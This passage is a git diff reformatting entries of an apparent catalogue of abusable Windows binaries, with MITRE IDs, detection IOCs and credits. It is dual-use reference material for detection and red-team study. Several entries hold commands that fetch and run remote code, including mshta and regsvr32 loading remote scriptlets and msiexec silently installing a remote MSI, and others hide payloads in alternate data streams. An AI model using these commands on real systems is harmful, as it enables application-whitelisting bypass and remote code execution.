https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ -Notes: Thanks to Casey Smith - @subtee, Cn33liz - @Cneelis - + - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md + - Link: https://github.com/Cn33liz/MSBuildShell + - Link: https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/ + - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' + - Person: Cn33liz + Handle: '@Cneelis' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Msconfig.yml b/yml/OSBinaries/Msconfig.yml index 823b57a..8e6e402 100644 --- a/yml/OSBinaries/Msconfig.yml +++ b/yml/OSBinaries/Msconfig.yml @@ -1,19 +1,27 @@ --- Name: Msconfig.exe -Description: Execute -Author: '' +Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: Msconfig.exe -5 Description: Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml. + Usecase: Code execution using Msconfig.exe + Category: Execute + Privileges: Administrator + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\msconfig.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\msconfig.exe +Code Sample: +- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/mscfgtlc.xml +Detection: + - IOC: mscfgtlc.xml changes in system32 folder + - IOC: msconfig.exe executing Resources: - - https://twitter.com/pabraeken/status/991314564896690177 -Notes: | - Thanks to Pierre-Alexandre Braeken - @pabraeken - See the Payloads folder for an example mscfgtlc.xml file. - + - Link: https://twitter.com/pabraeken/status/991314564896690177 +Acknowledgement: + - Person: Pierre-Alexandre Braeken + Handle: '@pabraeken' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Msdt.yml b/yml/OSBinaries/Msdt.yml index 1ecd5bf..f83d507 100644 --- a/yml/OSBinaries/Msdt.yml +++ b/yml/OSBinaries/Msdt.yml @@ -1,25 +1,37 @@ --- Name: Msdt.exe -Description: Execute -Author: '' +Description: Microsoft diagnostics tool +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - - Command: Open .diagcab package - Description: '' - - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml - /skip TRUE + - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. + Usecase: Execute code + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE + Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file. + Usecase: Execute code bypass Application whitelisting + Category: AWL bypass + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - 'C:\Windows\System32\Msdt.exe ' - - 'C:\Windows\SysWOW64\Msdt.exe ' -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\Msdt.exe + - Path: C:\Windows\SysWOW64\Msdt.exe +Code Sample: +- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/PCW8E57.xml +Detection: + - IOC: Resources: - - https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/ - - https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ - - https://twitter.com/harr0ey/status/991338229952598016 -Notes: | - Thanks to: - See the Payloads folder for an example PCW8E57.xml file. - + - Link: https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/ + - Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ + - Link: https://twitter.com/harr0ey/status/991338229952598016 +Acknowledgement: + - Person: + Handle: +--- \ No newline at end of file diff --git a/yml/OSBinaries/Mshta.yml b/yml/OSBinaries/Mshta.yml index c4c4f6a..9cb16a9 100644 --- a/yml/OSBinaries/Mshta.yml +++ b/yml/OSBinaries/Mshta.yml @@ -1,28 +1,57 @@ --- -Name: mshta.exe -Description: Execute, Read ADS -Author: '' +Name: Mshta.exe +Description: Used by Windows to execute html applications. (.hta) +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: mshta.exe evilfile.hta Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. + Usecase: Execute code + Category: Execute + Privileges: User + MitreID: T1170 + MitreLink: https://attack.mitre.org/wiki/Technique/T1170 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")")) Description: Executes VBScript supplied as a command line argument. - - Command: mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close(); + Usecase: Execute code + Category: Execute + Privileges: User + MitreID: T1170 + MitreLink: https://attack.mitre.org/wiki/Technique/T1170 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close(); Description: Executes JavaScript supplied as a command line argument. + Usecase: Execute code + Category: Execute + Privileges: User + MitreID: T1170 + MitreLink: https://attack.mitre.org/wiki/Technique/T1170 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: mshta.exe "C:\ads\file.txt:file.hta" Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript. + Usecase: Execute code hidden in alternate data stream + Category: Alternate data streams + Privileges: User + MitreID: T1170 + MitreLink: https://attack.mitre.org/wiki/Technique/T1170 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\System32\mshta.exe - - C:\Windows\SysWOW64\mshta.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\mshta.exe + - Path: C:\Windows\SysWOW64\mshta.exe +Code Sample: +- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct +Detection: + - IOC: mshta.exe executing raw or obfuscated script within the command-line + - IOC: Usage of HTA file Resources: - - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Mshta.md - - https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4 - - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct - - https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ - - https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ -Notes: Thanks to Casey Smith - @subtee, Oddvar Moe - @oddvarmoe - + - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4 + - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct + - Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ + - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' + - Person: Oddvar Moe + Handle: '@oddvarmoe' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Msiexec.yml b/yml/OSBinaries/Msiexec.yml index d1dbd56..b68a194 100644 --- a/yml/OSBinaries/Msiexec.yml +++ b/yml/OSBinaries/Msiexec.yml @@ -1,25 +1,54 @@ --- Name: Msiexec.exe -Description: Execute -Author: '' +Description: Used by Windows to execute msi files +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: msiexec /quiet /i cmd.msi Description: Installs the target .MSI file silently. + Usecase: Execute custom made msi file with attack code + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png Description: Installs the target remote & renamed .MSI file silently. + Usecase: Execute custom made msi file with attack code from remote server + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: msiexec /y "C:\folder\evil.dll" Description: Calls DLLRegisterServer to register the target DLL. + Usecase: Execute dll files + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: msiexec /z "C:\folder\evil.dll" Description: Calls DLLRegisterServer to un-register the target DLL. + Usecase: Execute dll files + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\msiexec.exe - - c:\windows\sysWOW64\msiexec.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\msiexec.exe + - Path: C:\Windows\SysWOW64\msiexec.exe +Code Sample: +- Code: +Detection: + - IOC: msiexec.exe getting files from Internet Resources: - - https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/ - - https://twitter.com/PhilipTsukerman/status/992021361106268161 -Notes: Thanks to ? - @netbiosX, PhilipTsukerman - @PhilipTsukerman - + - Link: https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/ + - Link: https://twitter.com/PhilipTsukerman/status/992021361106268161 +Acknowledgement: + - Person: netbiosX + Handle: '@netbiosX' + - Person: Philip Tsukerman + Handle: @PhilipTsukerman +--- \ No newline at end of file diff --git a/yml/OSBinaries/Odbcconf.yml b/yml/OSBinaries/Odbcconf.yml index 93a9ee6..9cd761e 100644 --- a/yml/OSBinaries/Odbcconf.yml +++ b/yml/OSBinaries/Odbcconf.yml @@ -1,22 +1,28 @@ --- -Name: odbcconf.exe -Description: Execute -Author: '' +Name: Odbcconf.exe +Description: Used in Windows for managing ODBC connections +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: odbcconf -f file.rsp - Description: Load DLL specified in target .RSP file. + Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file. + Usecase: Execute dll file using technique that can evade defensive counter measures + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - 'c:\windows\system32\odbcconf.exe ' - - c:\windows\sysWOW64\odbcconf.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\odbcconf.exe + - Path: C:\Windows\SysWOW64\odbcconf.exe +Code Sample: +- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/file.rsp +Detection: + - IOC: Resources: - - https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b - - https://github.com/woanware/application-restriction-bypasses - - https://twitter.com/subTee/status/789459826367606784 -Notes: | - Thanks to Casey Smith - @subtee, Nick Tyrer - @NickTyrer - See the Playloads folder for an example .RSP file. - + - Link: https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b + - Link: https://github.com/woanware/application-restriction-bypasses +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Pcalua.yml b/yml/OSBinaries/Pcalua.yml index 147f003..af4e1e8 100644 --- a/yml/OSBinaries/Pcalua.yml +++ b/yml/OSBinaries/Pcalua.yml @@ -1,24 +1,44 @@ --- Name: Pcalua.exe -Description: Execute -Author: '' +Description: Program Compatibility Assistant +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: pcalua.exe -a calc.exe Description: Open the target .EXE using the Program Compatibility Assistant. + Usecase: Proxy execution of binary + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: pcalua.exe -a \\server\payload.dll Description: Open the target .DLL file with the Program Compatibilty Assistant. + Usecase: Proxy execution of remote dll file + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java Description: Open the target .CPL file with the Program Compatibility Assistant. + Usecase: Execution of CPL files + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\pcalua.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\pcalua.exe +Code Sample: +- Code: +Detection: + - IOC: Resources: - - https://twitter.com/KyleHanslovan/status/912659279806640128 -Notes: | - Thanks to: - fab - @0rbz_ - Kyle Hanslovan - @KyleHanslovan - + - Link: https://twitter.com/KyleHanslovan/status/912659279806640128 +Acknowledgement: + - Person: Kyle Hanslovan + Handle: '@kylehanslovan' + - Person: Fab + Handle: @0rbz_ +--- \ No newline at end of file diff --git a/yml/OSBinaries/Pcwrun.yml b/yml/OSBinaries/Pcwrun.yml index 2afd5db..65ebb0e 100644 --- a/yml/OSBinaries/Pcwrun.yml +++ b/yml/OSBinaries/Pcwrun.yml @@ -1,17 +1,26 @@ --- Name: Pcwrun.exe -Description: Execute -Author: '' +Description: Program Compatibility Wizard +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: Pcwrun.exe c:\temp\beacon.exe Description: Open the target .EXE file with the Program Compatibility Wizard. + Usecase: Proxy execution of binary + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\pcwrun.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\pcwrun.exe +Code Sample: +- Code: +Detection: + - IOC: Resources: - - https://twitter.com/pabraeken/status/991335019833708544 -Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken - + - Link: https://twitter.com/pabraeken/status/991335019833708544 +Acknowledgement: + - Person: Pierre-Alexandre Braeken + Handle: '@pabraeken' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Presentationhost.yml b/yml/OSBinaries/Presentationhost.yml index 4461ccc..d7f528d 100644 --- a/yml/OSBinaries/Presentationhost.yml +++ b/yml/OSBinaries/Presentationhost.yml @@ -1,19 +1,28 @@ --- -Name: PresentationHost.exe -Description: Execute -Author: '' +Name: Presentationhost.exe +Description: File is used for executing Browser applications +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: Presentationhost.exe C:\temp\Evil.xbap - Description: Executes the target XAML Browser Application (XBAP) file. + Description: Executes the target XAML Browser Application (XBAP) file + Usecase: Execute code within xbap files + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - 'c:\windows\system32\PresentationHost.exe ' - - 'c:\windows\sysWOW64\PresentationHost.exe ' -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\Presentationhost.exe + - Path: C:\Windows\SysWOW64\Presentationhost.exe +Code Sample: +- Code: +Detection: + - IOC: Resources: - - https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf - - https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ -Notes: Thanks to Casey Smith - @subtee - + - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf + - Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Print.yml b/yml/OSBinaries/Print.yml index 2dca5c2..84be934 100644 --- a/yml/OSBinaries/Print.yml +++ b/yml/OSBinaries/Print.yml @@ -1,23 +1,45 @@ --- Name: Print.exe -Description: Download, Copy, Add ADS -Author: '' +Description: Used by Windows to send files to the printer +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe Description: Copy file.exe into the Alternate Data Stream (ADS) of file.txt. + Usecase: Hide binary file in alternate data stream to potentially bypass defensive counter measures + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe Description: Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe + Usecase: Copy files + Category: Copy + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe Description: Copy File.exe from a network share to the target c:\OutFolder\outfile.exe. + Usecase: Copy/Download file from remote server + Category: Copy + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\System32\print.exe - - C:\Windows\SysWOW64\print.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\print.exe + - Path: C:\Windows\SysWOW64\print.exe +Code Sample: +- Code: +Detection: + - IOC: Print.exe getting files from internet + - IOC: Print.exe creating executable files on disk Resources: - - https://twitter.com/Oddvarmoe/status/985518877076541440 - - https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410 -Notes: Thanks to Oddvar Moe - @oddvarmoe - + - Link: https://twitter.com/Oddvarmoe/status/985518877076541440 + - Link: https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410 +Acknowledgement: + - Person: Oddvar Moe + Handle: '@oddvarmoe' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Reg.yml b/yml/OSBinaries/Reg.yml index 90eb292..28e46d0 100644 --- a/yml/OSBinaries/Reg.yml +++ b/yml/OSBinaries/Reg.yml @@ -1,18 +1,27 @@ --- -Name: reg.exe -Description: Export Reg, Add ADS, Import Reg -Author: '' +Name: Reg.exe +Description: Used to manipulate the registry +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg - Description: Export the target Registry key and save it to the specified .REG file. + Description: Export the target Registry key and save it to the specified .REG file within an Alternate data stream. + Usecase: Hide/plant registry information in Alternate data stream for later use + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\reg.exe - - c:\windows\sysWOW64\reg.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\reg.exe + - Path: C:\Windows\SysWOW64\reg.exe +Code Sample: +- Code: +Detection: + - IOC: reg.exe writing to an ADS Resources: - - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f -Notes: Thanks to Oddvar Moe - @oddvarmoe - + - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f +Acknowledgement: + - Person: Oddvar Moe + Handle: '@oddvarmoe' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Regasm.yml b/yml/OSBinaries/Regasm.yml index 04d1966..62d4a91 100644 --- a/yml/OSBinaries/Regasm.yml +++ b/yml/OSBinaries/Regasm.yml @@ -1,25 +1,39 @@ --- Name: Regasm.exe -Description: Execute -Author: '' +Description: Part of .NET +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - - Command: regasm.exe /U AllTheThingsx64.dll - Description: Loads the target .DLL file and executes the UnRegisterClass function. - - Command: regasm.exe AllTheThingsx64.dll + - Command: regasm.exe AllTheThingsx64.dll Description: Loads the target .DLL file and executes the RegisterClass function. + Usecase: Execute code and bypass Application whitelisting + Category: AWL bypass + Privileges: User + MitreID: T1121 + MitreLink: https://attack.mitre.org/wiki/Technique/T1121 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: regasm.exe AllTheThingsx64.dll + Description: Loads the target .DLL file and executes the RegisterClass function. + Usecase: Execute code and bypass Application whitelisting + Category: Execute + Privileges: User + MitreID: T1121 + MitreLink: https://attack.mitre.org/wiki/Technique/T1121 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe + - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe +Code Sample: +- Code: +Detection: + - IOC: regasm.exe executing dll file Resources: - - https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ - - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs - - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md - - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ -Notes: Thanks to Casey Smith - @subtee - + - Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ + - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ + - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1121/T1121.md +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Regedit.yml b/yml/OSBinaries/Regedit.yml index b88def4..eb3f1d2 100644 --- a/yml/OSBinaries/Regedit.yml +++ b/yml/OSBinaries/Regedit.yml @@ -1,20 +1,36 @@ --- -Name: regedit.exe -Description: Write ADS, Read ADS, Import registry -Author: '' +Name: Regedit.exe +Description: Used by Windows to manipulate registry +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey Description: Export the target Registry key to the specified .REG file. + Usecase: Hide registry data in alternate data stream + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - Command: regedit C:\ads\file.txt:regfile.reg" Description: Import the target .REG file into the Registry. + Usecase: Import hidden registry data from alternate data stream + Category: Alternate data streams + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/wiki/Technique/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\System32\regedit.exe - - C:\Windows\SysWOW64\regedit.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\regedit.exe + - Path: C:\Windows\SysWOW64\regedit.exe +Code Sample: +- Code: +Detection: + - IOC: regedit.exe reading and writing to alternate data stream + - IOC: regedit.exe should normally not be executed by end-users Resources: - - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f -Notes: Thanks to Oddvar Moe - @oddvarmoe - + - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f +Acknowledgement: + - Person: Oddvar Moe + Handle: '@oddvarmoe' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Register-cimprovider.yml b/yml/OSBinaries/Register-cimprovider.yml index 0db2e3e..5b2b37d 100644 --- a/yml/OSBinaries/Register-cimprovider.yml +++ b/yml/OSBinaries/Register-cimprovider.yml @@ -1,18 +1,27 @@ --- Name: Register-cimprovider.exe -Description: Execute -Author: '' +Description: Used to register new wmi providers +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: Register-cimprovider -path "C:\folder\evil.dll" Description: Load the target .DLL. + Usecase: Execute code within dll file + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/wiki/Technique/T1218 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - c:\windows\system32\Register-cimprovider.exe - - c:\windows\sysWOW64\Register-cimprovider.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\Register-cimprovider.exe + - Path: C:\Windows\SysWOW64\Register-cimprovider.exe +Code Sample: +- Code: +Detection: + - IOC: Resources: - - https://twitter.com/PhilipTsukerman/status/992021361106268161 -Notes: Thanks to PhilipTsukerman - @PhilipTsukerman - + - Link: https://twitter.com/PhilipTsukerman/status/992021361106268161 +Acknowledgement: + - Person: Philip Tsukerman + Handle: '@PhilipTsukerman' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Regsvcs.yml b/yml/OSBinaries/Regsvcs.yml index 685d988..8a9335b 100644 --- a/yml/OSBinaries/Regsvcs.yml +++ b/yml/OSBinaries/Regsvcs.yml @@ -1,23 +1,37 @@ --- Name: Regsvcs.exe -Description: Execute -Author: '' +Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: regsvcs.exe AllTheThingsx64.dll Description: Loads the target .DLL file and executes the RegisterClass function. + Usecase: Execute dll file and bypass Application whitelisting + Category: Execute + Privileges: User + MitreID: T1121 + MitreLink: https://attack.mitre.org/wiki/Technique/T1121 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: regsvcs.exe AllTheThingsx64.dll + Description: Loads the target .DLL file and executes the RegisterClass function. + Usecase: Execute dll file and bypass Application whitelisting + Category: AWL bypass + Privileges: User + MitreID: T1121 + MitreLink: https://attack.mitre.org/wiki/Technique/T1121 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full Path: - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe -Code Sample: [] -Detection: [] + - Path: C:\Windows\System32\regsvcs.exe + - Path: C:\Windows\SysWOW64\regsvcs.exe +Code Sample: +- Code: +Detection: + - IOC: Resources: - - https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ - - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs - - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md - - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ -Notes: Thanks to Casey Smith - @subtee - + - Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/ + - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ + - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1121/T1121.md +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Regsvr32.yml b/yml/OSBinaries/Regsvr32.yml index 1347c93..e750927 100644 --- a/yml/OSBinaries/Regsvr32.yml +++ b/yml/OSBinaries/Regsvr32.yml @@ -1,22 +1,54 @@ --- Name: Regsvr32.exe -Description: Execute -Author: '' +Description: Used by Windows to register dlls +Author: 'Oddvar Moe' Created: '2018-05-25' -Categories: [] Commands: - Command: regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll Description: Execute the specified remote .SCT script with scrobj.dll. - - Commands: regsvr32.exe /s /u /i:file.sct scrobj.dll + Usecase: Execute code from remote scriptlet, bypass Application whitelisting + Category: AWL bypass + Privileges: User + MitreID: T1117 + MitreLink: 